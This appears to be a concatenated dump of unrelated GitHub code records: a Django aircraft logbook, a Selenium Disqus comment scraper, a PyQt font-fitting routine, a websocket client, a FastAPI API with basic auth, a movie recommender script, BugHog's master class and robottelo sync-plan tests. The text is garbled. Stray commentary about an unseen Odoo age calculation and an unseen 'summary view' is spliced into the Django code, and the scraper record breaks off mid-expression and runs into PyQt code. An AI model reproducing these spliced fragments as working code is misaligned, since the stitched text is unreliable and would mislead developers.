AircraftForm(request.POST)\n if aircraftform.is_valid():\n # 
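The age computation in the sapi model above is the one piece of logic that is easy to test outside Odoo. A standalone sketch of just that calculation (python-dateutil assumed), mirroring the record's "Xy Ym Zd" format:

from datetime import date
from dateutil.relativedelta import relativedelta

def age_string(born, today=None):
    """Return the age between two dates as 'Xy Ym Zd', as the record formats it."""
    if born is None:
        return "No Date Of Birth!!"
    rd = relativedelta(today or date.today(), born)
    return f"{rd.years}y {rd.months}m {rd.days}d"

assert age_string(date(2020, 1, 15), date(2023, 3, 20)) == "3y 2m 5d"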
aircraftform.clean()\n aircraftform.save()\n return redirect(\"logo:aircraft_list\")\n context = {\"aircrafts\" : aircrafts, 'aircraftform' :aircraftform}\n return render(request, \"logo/aircraft_list.html\", context)\n\ndef delete_aircraft(request,pk):\n aircraft = Aircraft.objects.get(id = pk)\n if request.method == \"POST\":\n aircraft.delete()\n return redirect('logo:aircraft_list')\n context ={\"aircraft\":aircraft}\n return render(request,\"logo/delete_aircraft.html\", context)\n\ndef update_aircraft(request,pk):\n aircraftobj = Aircraft.objects.get(id=pk)\n aircrafts = Aircraft.objects.all()\n aircraftform = AircraftForm(instance=aircraftobj)\n if request.method == 'POST':\n aircraftform = AircraftForm(request.POST, instance = aircraftobj)\n if aircraftform.is_valid():\n aircraftform.save()\n return redirect(\"logo:aircraft_list\")\n context = {\"aircrafts\":aircrafts, \"aircraftform\":aircraftform}\n return render(request, \"logo/aircraft_list.html\", context)\n\ndef people(request):\n people = People.objects.all()\n peopleform = PeopleForm()\n\n if request.method ==\"POST\":\n peopleform = PeopleForm(request.POST)\n if peopleform.is_valid():\n peopleform.save()\n return redirect(\"logo:people\")\n context = {\"people\":people, \"peopleform\":peopleform}\n return render(request, \"logo/people.html\",context)\n\ndef delete_person(request,pk):\n person = People.objects.get(id = pk)\n person.delete()\n return redirect(\"logo:people\")\n\ndef airport(request):\n airports = Airport.objects.all()\n airportform = AirportForm()\n\n if request.method ==\"POST\":\n airportform = AirportForm(request.POST)\n if airportform.is_valid():\n airportform.save()\n return redirect(\"logo:airport_list\")\n context = {\"airports\":airports, \"airportform\":airportform}\n return render(request, \"logo/airport_list.html\",context)\n\ndef delete_airport(request,pk):\n airport = Airport.objects.get(id = pk)\n if request.method == \"POST\":\n airport.delete()\n return redirect('logo:airport_list')\n context ={\"airport\":airport}\n return render(request,\"logo/delete_airport.html\", context)\n\ndef update_airport(request,pk):\n placeobj = Airport.objects.get(id=pk)\n airports = Airport.objects.all()\n airportform = AirportForm(instance=placeobj)\n if request.method == 'POST':\n airportform = AirportForm(request.POST, instance = placeobj)\n if airportform.is_valid():\n airportform.save()\n return redirect(\"logo:airport_list\")\n context = {\"airports\":airports, \"airportform\":airportform}\n return render(request, \"logo/airport_list.html\", context)","repo_name":"kulu88/logbook","sub_path":"logbook/logo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45616498445","text":"from django.shortcuts import render\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\n# Create your views here.\ndef index(request):\n if request.method == 'POST':\n flow_url = request.POST['flow_url']\n else:\n flow_url = \"https://the-flow.ru/features/vse-recenzii-na-oksimirona-krasota-i-urodstvo\"\n return render(request, \"sort_comments/index.html\", {'flow_url': flow_url})\n\n options = webdriver.ChromeOptions()\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n options.headless = True\n driver 
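The summary view above pipes Sum('sectorTime') through helper_mytimedelta, which is not shown in this file. A plausible hedged implementation of such a helper, formatting an aggregated timedelta the way pilot logbooks usually do (total hours can exceed 24); the project's real helper may differ.

from datetime import timedelta

def format_logbook_hours(delta):
    """Render a timedelta as H:MM; None (no flights yet) becomes 0:00."""
    if delta is None:
        return "0:00"
    minutes = int(delta.total_seconds() // 60)
    return f"{minutes // 60}:{minutes % 60:02d}"

assert format_logbook_hours(timedelta(hours=123, minutes=5)) == "123:05"
assert format_logbook_hours(None) == "0:00"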
= webdriver.Chrome(options=options)\n driver.maximize_window()\n driver.get(flow_url)\n\n wait = WebDriverWait(driver, 15)\n wait.until(EC.frame_to_be_available_and_switch_to_it((By.CSS_SELECTOR, \"iframe[title='Disqus']\")))\n\n # changing wait time depending on comments count\n comment_count = int(driver.find_element(By.CLASS_NAME, \"comment-count\").text.split(\" Comments\")[0])\n if comment_count < 101:\n wait = WebDriverWait(driver, 5)\n elif comment_count > 1000:\n wait = WebDriverWait(driver, 30)\n\n while True:\n try:\n element = wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"load-more__button\")))\n element.click()\n except:\n break\n\n c = driver.page_source\n driver.quit()\n\n soup = BeautifulSoup(c, 'html.parser')\n comments = soup.find_all(\"div\", {\"class\": \"post-content\"})\n\n all_comments = []\n for article in comments:\n comment = {}\n # try/except для отлова удаленных комментариев\n try:\n comment[\"username\"] = article.find(\"span\", {\"class\": \"author publisher-anchor-color\"}).get_text()\n comment[\"user_url\"] = article.find(\"span\", {\"class\": \"author publisher-anchor-color\"}).a['href']\n comment[\"time\"] = \",\".join(article.find(\"a\", {\"class\": \"time-ago\"}).get(\"title\").split(\",\")[1:])\n content = article.find(\"div\", {\"data-role\": \"message\"}).find(\"a\", {\"class\": \"media-button-expand\"})\n if content:\n if content.get(\"href\").startswith(\"https://www.youtube.com/\"):\n comment[\"youtube_url\"] = content.get(\"href\").split(\"https://www.youtube.com/watch?v=\")[1].split('&')[0]\n comment[\"content_url\"] = None\n else:\n comment[\"youtube_url\"] = None\n comment[\"content_url\"] = content.get(\"href\")\n comment[\"raw_comment\"] = str(article.find(\"div\", {\"data-role\": \"message\"})).split(\n '
    = label.height() or bound.width() >= label.width()):\n fit = False;\n myFont.setPointSize(myFont.pointSize() - 1);\n break;\n myFont.setPointSize(myFont.pointSize() + 1);\n tmp.setFont(myFont);\n\n label.setFont(myFont);\n label.setText(string); \n #print(myFont.pointSize());\n","repo_name":"yycho0108/OlinSchedulerPy","sub_path":"CourseObject.py","file_name":"CourseObject.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28405286733","text":"\"\"\"A simple websocket python client.\n\"\"\"\nimport asyncio\nimport websockets\nimport time\n\nurl = \"ws://localhost:8100/bench/websocket\"\n\n\nasync def listen():\n counter = 0\n t_0 = time.time_ns()\n async with websockets.connect(url) as websocket:\n async for message in websocket:\n counter += 1\n delta_t = time.time_ns() - t_0\n duration = delta_t/1000000000\n average = int(delta_t / counter)\n\n print(f\"Messages: {counter:>13}\")\n print(f\"Duration: {duration:>11.3f} s\")\n print(f\"Average: {average:>10} ns\")\n\n\nasyncio.get_event_loop().run_until_complete(listen())\n","repo_name":"CharlyCst/js-py-ipc-bench","sub_path":"websocket/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1991980279","text":"\"\"\"\nAPI for tracking updated indicators for Tracking Progress.\n\nFront end form on the intranet enables adding and removing the names of indicators that have been\nupdated.\n\nThe GET endpoint returns a list of indicators updated in the past 30 days so the TP app can display\na UI element on the indicator to represent that.\n\"\"\"\nimport datetime\nfrom typing import List\nfrom typing_extensions import Annotated\nimport secrets\n\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.responses import JSONResponse\nfrom fastapi.security import HTTPBasic, HTTPBasicCredentials\nimport psycopg\nfrom pydantic import BaseModel\n\nfrom config import PG_CREDS, USERNAME, PASSWORD\n\n\nclass Indicator(BaseModel):\n name: str\n\n\nclass Message(BaseModel):\n message: str\n\n\nPATH = \"/api/tp-updates/v1\"\n\napp = FastAPI(\n title=\"Tracking Progress Updates API\",\n openapi_url=PATH + \"/openapi.json\",\n docs_url=PATH + \"/docs\",\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\n \"http://linux3.dvrpc.org\",\n \"http://linux4.dvrpc.org\",\n \"http://intranet.dvrpc.org\",\n \"http://staging.dvrpc.org\",\n \"https://staging.dvrpc.org\",\n \"https://dvrpc.org\",\n \"https://www.dvrpc.org\",\n ],\n allow_credentials=True,\n allow_methods=[\"GET\", \"POST\", \"DELETE\"],\n allow_headers=[\"*\"],\n)\n\nsecurity = HTTPBasic()\n\n\ndef basic_auth(credentials: Annotated[HTTPBasicCredentials, Depends(security)]):\n \"\"\"\n Create a simple verification method using Basic HTTP Authentication.\n In any HTTP request, use the Basic Auth Authorization header to provide a username and password,\n which will be validated against the environment variables in config.py.\n This fn can be used in an endpoint to add authentication to it. 
See the POST and DELETE\n endpoints below.\n \"\"\"\n is_correct_username = secrets.compare_digest(\n credentials.username.encode(\"utf8\"), USERNAME.encode(\"utf8\")\n )\n is_correct_password = secrets.compare_digest(\n credentials.password.encode(\"utf8\"), PASSWORD.encode(\"utf8\")\n )\n if not (is_correct_username and is_correct_password):\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Incorrect username or password\",\n headers={\"WWW-Authenticate\": \"Basic\"},\n )\n return\n\n\ndef db():\n \"\"\"\n Create connection to database.\n\n Using a function so that we can insert it as a dependency, and thus use a different\n database connection when testing.\n \"\"\"\n return psycopg.connect(PG_CREDS)\n\n\n@app.get(\n PATH + \"/indicators\",\n responses={500: {\"model\": Message, \"description\": \"Internal Server Error\"}},\n response_model=List[str],\n)\ndef get_indicators(db=Depends(db)):\n \"\"\"Return list of all indicators that have been updated in past 30 days.\"\"\"\n one_month_ago = datetime.date.today() - datetime.timedelta(days=30)\n\n try:\n with db as conn:\n results = conn.execute(\n \"SELECT * FROM updates WHERE updated >= %s\", [one_month_ago]\n ).fetchall()\n except psycopg.Error as e:\n return JSONResponse(status_code=500, content={\"message\": \"Database error: \" + str(e)})\n\n if not results:\n return []\n\n indicators = []\n for row in results:\n indicators.append(row[1])\n\n return list(set(indicators))\n\n\n@app.post(\n PATH + \"/indicators\",\n responses={500: {\"model\": Message, \"description\": \"Internal Server Error\"}},\n status_code=201,\n response_model=Message,\n)\ndef add_indicator(\n username: Annotated[str, Depends(basic_auth)], indicator: Indicator, db=Depends(db)\n):\n \"\"\"Add updated indicator.\"\"\"\n try:\n with db as conn:\n cur = conn.execute(\"INSERT INTO updates (indicator) VALUES (%s)\", [indicator.name])\n\n except psycopg.Error as e:\n return JSONResponse(status_code=500, content={\"message\": \"Database error: \" + str(e)})\n\n if cur.statusmessage != \"INSERT 0 1\":\n return JSONResponse(\n status_code=500,\n content={\"message\": \"Error inserting indicator, contact developer.\"},\n )\n\n return {\"message\": \"success\"}\n\n\n@app.delete(\n PATH + \"/indicators\",\n responses={\n 404: {\"model\": Message, \"description\": \"Not Found\"},\n 500: {\"model\": Message, \"description\": \"Internal Server Error\"},\n },\n response_model=Message,\n)\ndef delete_indicator(\n username: Annotated[str, Depends(basic_auth)], indicator: Indicator, db=Depends(db)\n):\n \"\"\"Delete an updated indicator (in case one was mistakenly added).\"\"\"\n\n try:\n with db as conn:\n cur = conn.execute(\"DELETE FROM updates WHERE indicator = %s\", [indicator.name])\n except psycopg.Error as e:\n return JSONResponse(status_code=500, content={\"message\": \"Database error: \" + str(e)})\n\n if \"DELETE\" in cur.statusmessage:\n if cur.statusmessage == \"DELETE 0\":\n return JSONResponse(\n status_code=404,\n content={\"message\": \"No indicator with that name found; not deleted.\"},\n )\n return {\"message\": \"success\"}\n\n return JSONResponse(\n status_code=500,\n content={\"message\": \"Error deleting indicator, contact developer.\"},\n )\n","repo_name":"dvrpc/tp-updates","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40340071691","text":"\n# Generating features\n\n\n# Set working 
directory\nimport sys\nsys.path.append('../scraping')\nsys.path.append('../tools')\nimport db_connect\nimport math\n\nimport pandas as pd\nimport numpy as np\n\n\n\n\n# Define Database connection detail\ndb_credential = ['../../connection-details/db-reco-engine.credential',\n 'reco-engine', 'production']\n# Get data from Database\ncol = db_connect.get_collection(db_credential)\n\n# Data Manipulation\ndf = pd.DataFrame(list(col.find({})))\n\n#print(df.iloc[8])\n\n#a = df.iloc[55]\n#type(df['Audience_Score_ur'][1])\n\n\n# Audience Score\n# Converting str into value between 0 and 1\ndf['Audience_Score'].fillna('0', inplace=True)\ndf['Audience_Score'] = pd.to_numeric(df['Audience_Score'].str.replace('%', ''), errors = 'coerce')/100\n\n\n# Tomatometer\n# Converting str into value between 0 and 1\ndf['Tomato_Meter'].fillna('0', inplace=True)\ndf['Tomato_Meter'] = pd.to_numeric(df['Tomato_Meter'].str.replace('%', ''), errors = 'coerce')/100\n\n\n# Movie Year\n# Creating a new variable 'Movie_Yr' and applying minmax scaling\ndf['Movie_Yr'] = 1900\nfor i in range(len(df['_id'])):\n try:\n df.loc[i, 'Movie_Yr'] = pd.to_numeric(df.loc[i, 'MI_In_Theaters_1'][-4:], errors = 'coerce')\n except:\n try:\n df.loc[i, 'Movie_Yr'] = pd.to_numeric(df.loc[i, 'MI_On_Disc_1'][-4:], errors = 'coerce')\n except:\n df.loc[i, 'Movie_Yr'] = 1900\n \nyr_max = max(df['Movie_Yr'])\nyr_min = min(df['Movie_Yr'])\ndf['Scaled_Movie_Yr'] = 0.000\nfor i in range(len(df['_id'])):\n df.loc[i, 'Scaled_Movie_Yr'] = (df.loc[i, 'Movie_Yr'] - yr_min)/(yr_max - yr_min)\n\n\n# Runtime\n# Creating a new variable 'Runtime' and applying minmax scaling\ndf['Runtime'] = pd.to_numeric(df['MI_Runtime_1'].str.replace(' minutes', ''), errors = 'coerce')\nfor i in range(len(df['_id'])):\n if df.loc[i, 'Runtime'] > 300:\n df.loc[i, 'Runtime'] = 300\n\nruntime_max = max(df['Runtime'])\nruntime_min = min(df['Runtime'])\ndf['Scaled_Runtime'] = 0.000\nfor i in range(len(df['_id'])):\n df.loc[i, 'Scaled_Runtime'] = (df.loc[i, 'Runtime'] - runtime_min)/(runtime_max - runtime_min)\n\n\n# Franchise\n# Replacing NaNs with 0 first \ndf['Franchise'].fillna(0, inplace=True)\n# Replacing non-0 values with 1 since they are a part of a franchise\nfor i in range(len(df['_id'])):\n if df.loc[i, 'Franchise'] != 0:\n df.loc[i, 'Franchise'] = 1\n \n#df['Franchise'].value_counts()\n\n\n# Movie Rating (to be used in conjunction with Genre)\n# Removing the extra content within parenthesis that explains the basis for the rating\ndf['MI_Rating'] = df['MI_Rating'].str.replace(r'\\s+\\(.*\\)','')\n\n\n# Cleaning up cast names\n# Firstly, replacing the NaNs with 0s\ndf['Casts'].fillna(0, inplace = True)\n\n# Secondly, removing the on-screen character names from the list\n# and also adding the new resulting cast list to the dataframe\ndf['Updated_Cast'] = 0\nfor i in range(len(df['_id'])):\n if df.loc[i, 'Casts'] != 0:\n cast_per_movie = list()\n for j in range(len(df['Casts'][i])):\n cast_per_movie.append(df['Casts'][i][j][0])\n df.loc[i, 'Updated_Cast'] = ', '.join(cast_per_movie)\n\n\n# Creating dummy variables for Genres\n# Using a temporary df to hold the dummies\ndf_temp = pd.get_dummies(df['MI_Genre'].apply(pd.Series).stack(), prefix='Genre').sum(level = 0)\ndf_final = pd.concat([df, df_temp], axis = 1)\n\n# Keeping only the required columns\n# Defining the variable cols to hold the required columns\ncols_v2 = ['Audience_Score', 'Franchise', 'Tomato_Meter', 'Scaled_Runtime', 'Scaled_Movie_Yr',\n 'Genre_1.0', \n 'Genre_2.0', \n 'Genre_3.0', \n 'Genre_4.0', \n 
'Genre_5.0', \n 'Genre_6.0', \n 'Genre_7.0', \n 'Genre_8.0', \n 'Genre_9.0', \n 'Genre_10.0', \n 'Genre_11.0', \n 'Genre_12.0', \n 'Genre_13.0', \n 'Genre_14.0', \n 'Genre_15.0', \n 'Genre_16.0', \n 'Genre_17.0', \n 'Genre_18.0', \n 'Genre_19.0', \n 'Genre_20.0', \n 'Genre_21.0']\n\ndf_knn_v2 = df_final[cols_v2]\n\n# function for knn\n# sckit-learn algo here\n\n# custom knn from scratch\n# function to calculate distance between 2 instances\n# function to return top 5 neighbors depending on the input\n# https://machinelearningmastery.com/tutorial-to-implement-k-nearest-neighbors-in-python-from-scratch/\n# **** this is python 2 ****\n\n\n\ndef get_dist(df_record1, df_record2):\n return math.sqrt(sum((df_record1 - df_record2)**2))\n \n \ndef get_neighbors(test_instance, df, k):\n length_df = len(df)\n distances = list()\n for i in range(length_df):\n distances.append(get_dist(test_instance, df.iloc[i]))\n \n indices = list(np.array(distances).argsort()[1:k]) \n \n return indices\n \n\ntest_index = 11150\nrecos = 4\ntest_instance = df_knn_v2.iloc[test_index]\nind = get_neighbors(test_instance, df_knn_v2, recos)\n\nprint('\\nInput:' + df.loc[test_index, 'Movie_Name'])\nprint('\\nRecommendations:')\nfor i in ind:\n print(df.loc[i, 'Movie_Name'])\n\n\n# add some context of the movie\n# - maybe extract topics from description and then compare?\n\n\n\n \n \n \n\n\n# =============================================================================\n# \n# # variables for knn\n# Audience_Score - done\n# Franchise - done\n# MI_Rating 'dummy??????????\n# Tomato_Meter - done\n# Scaled_Runtime - done\n# Genre 'dummy\n# Need to bring in cast as well \n# \n# \n# =============================================================================\n\n\n\n\n\n\n\n################################################################################################\n\n########## Idea: Similarity algorithm ##########\n# Ask for 3 movies that user has seen recently as input\n# Find a movie closest from all 3\n# Find an upcoming movie closest from all 3 (use subset of data by filtering on In_Theatres_Date)\n################################################\n\n########## Idea: Collaborative Filtering algorithm ##########\n# Create user profiles (pre defined) (as future scope look into the ability to letting users select movies)\n# Let user pick a profile\n# Suggest 2-3 movies as recommendations\n################################################\n\n########## Idea: Similar Description ##########\n# Ask for 3 movies that user has seen recently as input\n# Find a movie description closest from all 3\n# Dice's coefficient can be used to find similarity. 
or even cosine similarity of tf-idf\n################################################\n \n################################################################################################\n","repo_name":"calvin-and-smit/movie-reco-engine","sub_path":"code/feature-gen/feature_gen_v1_2.py","file_name":"feature_gen_v1_2.py","file_ext":"py","file_size_in_byte":6546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30992429206","text":"import logging\n\nfrom dotenv import load_dotenv\n\nfrom analysis.plot_factory import PlotFactory\nfrom bci.configuration import Global\nfrom bci.database.mongo.mongodb import MongoDB, ServerException\nfrom bci.distribution.worker_manager import WorkerManager\nfrom bci.evaluations.custom.custom_evaluation import CustomEvaluationFramework\nfrom bci.evaluations.evaluation_framework import EvaluationFramework\nfrom bci.evaluations.logic import (DatabaseConnectionParameters,\n EvaluationParameters, PlotParameters,\n SequenceConfiguration, WorkerParameters)\nfrom bci.evaluations.outcome_checker import OutcomeChecker\nfrom bci.evaluations.samesite.samesite_evaluation import \\\n SameSiteEvaluationFramework\nfrom bci.evaluations.xsleaks.evaluation import XSLeaksEvaluation\nfrom bci.search_strategy.composite_search import CompositeSearch\nfrom bci.search_strategy.n_ary_search import NArySearch\nfrom bci.search_strategy.n_ary_sequence import NArySequence, SequenceFinished\nfrom bci.search_strategy.sequence_strategy import SequenceStrategy\nfrom bci.version_control import state_factory\nfrom bci.version_control.states.state import State\n\nlogger = logging.getLogger(__name__)\n\n\nclass Master:\n\n def __init__(self):\n self.running = False\n\n self.stop_gracefully = False\n self.stop_forcefully = False\n\n self.evaluations = []\n self.evaluation_framework = None\n self.worker_manager = None\n self.available_evaluation_frameworks = {}\n\n self.firefox_build = None\n self.chromium_build = None\n\n load_dotenv()\n\n Global.initialize_folders()\n self.db_connection_params = Global.get_database_connection_params()\n self.connect_to_database(self.db_connection_params)\n self.inititialize_available_evaluation_frameworks()\n logger.info(\"BugHog is ready!\")\n\n def connect_to_database(self, db_connection_params: DatabaseConnectionParameters):\n try:\n MongoDB.connect(db_connection_params)\n except ServerException:\n logger.error(\"Could not connect to database.\", exc_info=True)\n\n def run(self, eval_params: EvaluationParameters):\n self.running = True\n self.stop_gracefully = False\n self.stop_forcefully = False\n\n browser_config = eval_params.browser_configuration\n evaluation_config = eval_params.evaluation_configuration\n evaluation_range = eval_params.evaluation_range\n sequence_config = eval_params.sequence_configuration\n\n logger.info(f'Running experiments for {browser_config.browser_name} ({\", \".join(evaluation_range.mech_groups)})')\n self.evaluation_framework = self.get_specific_evaluation_framework(\n evaluation_config.project\n )\n worker_manager = WorkerManager(sequence_config.nb_of_containers)\n\n try:\n state_list = state_factory.get_state_list(browser_config, evaluation_range)\n\n search_strategy = self.parse_search_strategy(\n sequence_config.search_strategy, state_list, 2, sequence_config.sequence_limit\n )\n\n outcome_checker = OutcomeChecker(sequence_config)\n\n # The state_lineage is put into self.evaluation as a means to check on the process through front-end\n 
self.evaluations.append(state_list)\n\n try:\n current_state = search_strategy.next()\n while (self.stop_gracefully or self.stop_forcefully) is False:\n worker_params = eval_params.create_worker_params_for(current_state, self.db_connection_params)\n\n # Callback function for sequence strategy\n update_outcome = self.get_update_outcome_cb(search_strategy, worker_params, sequence_config, outcome_checker)\n\n # Check whether state is already evaluated\n if self.evaluation_framework.has_all_results(worker_params):\n logger.info(f\"State '{current_state.revision_number}' already evaluated.\")\n update_outcome()\n current_state = search_strategy.next()\n continue\n\n # Start worker to perform evaluation\n worker_manager.start_test(worker_params, update_outcome)\n\n current_state = search_strategy.next()\n except SequenceFinished:\n logger.debug(\"Last experiment has started\")\n\n except Exception as e:\n logger.critical(\"A critical error occurred\", exc_info=True)\n raise e\n finally:\n # Gracefully exit\n if self.stop_gracefully:\n logger.info(\"Gracefully stopping experiment queue due to user end signal...\")\n if self.stop_forcefully:\n logger.info(\"Forcefully stopping experiment queue due to user end signal...\")\n worker_manager.forcefully_stop_all_running_containers()\n else:\n logger.info(\"Gracefully stopping experiment queue since last experiment started.\")\n # MongoDB.disconnect()\n logger.info(\"Waiting for remaining experiments to stop...\")\n worker_manager.wait_until_all_evaluations_are_done()\n logger.info(\"BugHog has finished the evaluation!\")\n self.running = False\n\n @staticmethod\n def get_update_outcome_cb(search_strategy: SequenceStrategy, worker_params: WorkerParameters, sequence_config: SequenceConfiguration, checker: OutcomeChecker) -> None:\n def cb():\n if sequence_config.target_mech_id is not None and len(worker_params.mech_groups) == 1:\n result = MongoDB.get_instance().get_result(worker_params.create_test_params_for(worker_params.mech_groups[0]))\n outcome = checker.get_outcome(result)\n search_strategy.update_outcome(worker_params.state, outcome)\n return cb\n\n def inititialize_available_evaluation_frameworks(self):\n self.available_evaluation_frameworks[\"samesite\"] = SameSiteEvaluationFramework()\n self.available_evaluation_frameworks[\"custom\"] = CustomEvaluationFramework()\n self.available_evaluation_frameworks[\"xsleaks\"] = XSLeaksEvaluation()\n\n @staticmethod\n def parse_search_strategy(search_strategy_option: str, state_list: list[State], n: int, sequence_limit: int):\n if search_strategy_option == \"bin_seq\":\n return NArySequence(state_list, n, limit=sequence_limit)\n if search_strategy_option == \"bin_search\":\n return NArySearch(state_list, n)\n if search_strategy_option == \"comp_search\":\n return CompositeSearch(state_list, n, sequence_limit, NArySequence, NArySearch)\n raise AttributeError(\"Unknown search strategy option '%s'\" % search_strategy_option)\n\n def get_specific_evaluation_framework(self, evaluation_name: str) -> EvaluationFramework:\n # TODO: we always use 'custom', in which evaluation_name is a project\n evaluation_name = 'custom'\n if evaluation_name not in self.available_evaluation_frameworks.keys():\n raise AttributeError(\"Could not find a framework for '%s'\" % evaluation_name)\n return self.available_evaluation_frameworks[evaluation_name]\n\n def activate_stop_gracefully(self):\n if self.evaluation_framework:\n self.stop_gracefully = True\n self.evaluation_framework.stop_gracefully()\n logger.info(\"Received user 
signal to gracefully stop.\")\n else:\n logger.info(\"Received user signal to gracefully stop, but no evaluation is running.\")\n\n def activate_stop_forcefully(self):\n if self.evaluation_framework:\n self.stop_forcefully = True\n self.evaluation_framework.stop_gracefully()\n logger.info(\"Received user signal to forcefully stop.\")\n else:\n logger.info(\"Received user signal to forcefully stop, but no evaluation is running.\")\n\n def get_html_plot(self, params: PlotParameters) -> tuple[str, int]:\n return PlotFactory.create_html_plot_string(params, MongoDB.get_instance())\n","repo_name":"DistriNet/BugHog","sub_path":"bci/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"38460192096","text":"\"\"\"Test class for Sync Plan UI\n\n:Requirement: Syncplan\n\n:CaseAutomation: Automated\n\n:CaseLevel: Acceptance\n\n:CaseComponent: UI\n\n:TestType: Functional\n\n:CaseImportance: High\n\n:Upstream: No\n\"\"\"\n\nfrom datetime import datetime, timedelta\nfrom fauxfactory import gen_string\nfrom nailgun import entities\nfrom random import choice\nfrom robottelo import manifests\nfrom robottelo.api.utils import (\n enable_rhrepo_and_fetchid,\n wait_for_tasks,\n wait_for_syncplan_tasks\n)\nfrom robottelo.constants import PRDS, REPOS, REPOSET, SYNC_INTERVAL\nfrom robottelo.datafactory import (\n filtered_datapoint,\n generate_strings_list,\n invalid_values_list,\n)\nfrom robottelo.decorators import (\n run_in_one_thread,\n run_only_on,\n skip_if_bug_open,\n stubbed,\n tier1,\n tier2,\n tier3,\n tier4,\n upgrade,\n)\nfrom robottelo.test import UITestCase\nfrom robottelo.ui.factory import make_syncplan\nfrom robottelo.ui.locators import common_locators, locators, tab_locators\nfrom robottelo.ui.session import Session\nfrom time import sleep\n\n\n@filtered_datapoint\ndef valid_sync_intervals():\n \"\"\"Returns a list of valid sync intervals\"\"\"\n return [\n SYNC_INTERVAL['hour'],\n SYNC_INTERVAL['day'],\n SYNC_INTERVAL['week'],\n ]\n\n\nclass SyncPlanTestCase(UITestCase):\n \"\"\"Implements Sync Plan tests in UI\"\"\"\n\n @classmethod\n def setUpClass(cls):\n super(SyncPlanTestCase, cls).setUpClass()\n cls.organization = entities.Organization().create()\n\n @staticmethod\n def validate_task_status(repo_id, max_tries=10, repo_backend_id=None):\n \"\"\"Wait for Pulp and foreman_tasks to complete or timeout\n\n :param repo_id: Repository Id to identify the correct task\n :param max_tries: Max tries to poll for the task creation\n :param repo_backend_id: Backend identifier of repository to filter the\n pulp tasks\n \"\"\"\n if repo_backend_id:\n wait_for_syncplan_tasks(repo_backend_id)\n wait_for_tasks(\n search_query='resource_type = Katello::Repository'\n ' and owner.login = foreman_admin'\n ' and resource_id = {}'.format(repo_id),\n max_tries=max_tries\n )\n\n def validate_repo_content(self, repo, content_types, after_sync=True):\n \"\"\"Check whether corresponding content is present in repository before\n or after synchronization is performed\n\n :param repo: Repository entity instance to be validated\n :param content_types: List of repository content entities that\n should be validated (e.g. 
package, erratum, puppet_module)\n :param bool after_sync: Specify whether you perform validation before\n synchronization procedure is happened or after\n \"\"\"\n repo = repo.read()\n for content in content_types:\n if after_sync:\n self.assertIsNotNone(\n repo.last_sync, 'Repository unexpectedly was not synced.')\n self.assertGreater(\n repo.content_counts[content],\n 0,\n 'Repository contains invalid number of content entities.'\n )\n else:\n self.assertIsNone(\n repo.last_sync, 'Repository was unexpectedly synced.')\n self.assertFalse(\n repo.content_counts[content],\n 'Repository contains invalid number of content entities.'\n )\n\n def get_client_datetime(self, browser):\n \"\"\"Make Javascript call inside of browser session to get exact current\n date and time. In that way, we will be isolated from any issue that can\n happen due different environments where test automation code is\n executing and where browser session is opened. That should help us to\n have successful run for docker containers or separated virtual machines\n When calling .getMonth() you need to add +1 to display the correct\n month. Javascript count always starts at 0, so calling .getMonth() in\n May will return 4 and not 5.\n\n :param browser: Webdriver browser object.\n\n :return: Datetime object that contains data for current date and time\n on a client\n \"\"\"\n script = ('var currentdate = new Date(); return ({0} + \"-\" + {1} + '\n '\"-\" + {2} + \" : \" + {3} + \":\" + {4});').format(\n 'currentdate.getFullYear()',\n '(currentdate.getMonth()+1)',\n 'currentdate.getDate()',\n 'currentdate.getHours()',\n 'currentdate.getMinutes()',\n )\n client_datetime = browser.execute_script(script)\n return datetime.strptime(client_datetime, '%Y-%m-%d : %H:%M')\n\n @tier1\n def test_positive_create_with_name(self):\n \"\"\"Create Sync Plan with valid name values\n\n :id: ceb125a4-449a-4a86-a94f-2a28884e3a41\n\n :expectedresults: Sync Plan is created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for name in generate_strings_list():\n with self.subTest(name):\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description=gen_string('utf8'),\n sync_interval=choice(valid_sync_intervals()),\n )\n self.assertIsNotNone(self.syncplan.search(name))\n\n @tier1\n def test_positive_create_with_description(self):\n \"\"\"Create Sync Plan with valid desc values\n\n :id: 6ccd2229-dcc3-4090-9ec9-84fea837c50c\n\n :expectedresults: Sync Plan is created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for desc in generate_strings_list():\n with self.subTest(desc):\n name = gen_string('utf8')\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description=desc,\n sync_interval=choice(valid_sync_intervals()),\n )\n self.assertIsNotNone(self.syncplan.search(name))\n\n @tier1\n def test_positive_create_with_sync_interval(self):\n \"\"\"Create Sync Plan with valid sync intervals\n\n :id: 8916285a-c8d2-415a-b694-c32727e93ac0\n\n :expectedresults: Sync Plan is created\n\n :CaseImportance: Critical\n \"\"\"\n with Session(self) as session:\n for interval in valid_sync_intervals():\n with self.subTest(interval):\n name = gen_string('alphanumeric')\n make_syncplan(\n session,\n org=self.organization.name,\n name=name,\n description=name,\n sync_interval=interval,\n )\n self.assertIsNotNone(self.syncplan.search(name))\n\n 